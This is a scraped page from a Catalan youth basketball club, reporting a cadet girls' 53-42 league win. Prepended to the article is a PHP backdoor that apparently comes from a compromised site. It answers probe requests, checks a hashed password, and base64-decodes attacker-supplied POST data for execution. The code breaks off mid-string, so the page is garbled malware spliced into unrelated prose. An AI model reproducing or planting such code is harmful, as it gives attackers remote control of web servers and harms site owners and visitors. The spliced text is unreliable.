function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria amb lliçó del Cadet Fem 09B (53-42) - Tgn Bàsquet Club -

Victòria amb lliçó del Cadet Fem 09B (53-42)

Updated: febrer 7, 2024

Partit corresponent a la catorzena jornada del nivell A de la categoria Cadet Femení Promoció Territorial.

Un gran primer quart de les liles (19-9) permetia visualitzar un partit tranquil i gairebé de tràmit, però si una cosa està clara en aquesta lliga és que si no es manté la intensitat, les ganes i la concentració al llarg de tots els períodes, tots els equips et poden donar, com a mínim, un ensurt, i si et distreus en excés emportar-se la victòria.

El segon quart va presentar un parcial de 8-16. Feia moltes jornades que no es perdia d’una forma tan clara en el joc i en el resultat i, tot i entendre que les rivals també juguen, haurà de ser motiu de reflexió i autocrítica individual i com a equip. Aspectes com aquests són els que caracteritzen el bàsquet de formació i de creixement personal.

El tercer període va permetre marxar en el marcador i semblava que, ara sí, les liles havien trobat bona part del joc que les caracteritza. Tanmateix, el darrer quart va ser d’una igualtat total on, fins i tot, el CB. Morell es va arribar a situar a 2 punts.

En definitiva, partit que s’havia de guanyar, la desena victòria consecutiva, i que ha de servir per extreure lliçons per continuar l’evolució positiva. No hi ha cap dubte de les possibilitats d’un equip que està demostrant, entrenament rere entrenament, que està creixent i millorant.

Aquesta setmana, aprofitant un merescudíssim descans per Carnaval, es canvia el partit per un també merescudíssim sopar d’equip. A la següent jornada es visitarà la pista del Reus Deportiu Vermell. Serà el diumenge 18 a les 12.30 h.